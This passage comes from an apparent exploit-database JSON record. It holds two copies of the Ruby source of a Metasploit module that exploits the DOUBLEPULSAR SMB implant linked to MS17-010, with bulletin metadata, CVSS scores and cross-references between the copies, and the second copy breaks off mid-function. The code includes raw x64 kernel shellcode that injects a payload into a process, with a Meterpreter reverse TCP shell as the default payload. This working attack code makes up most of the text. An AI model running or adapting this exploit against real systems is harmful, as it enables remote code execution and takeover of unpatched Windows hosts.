to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-01] #"}, "lastseen": "2021-09-01T16:40:01", "differentElements": ["sourceData"], "edition": 3}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "30627fb0f1466f655be2338b12d00f0c", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-09-01T22:15:27", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", 
"OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2021-09-01T22:15:27", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-01T22:15:27", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => 
true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = 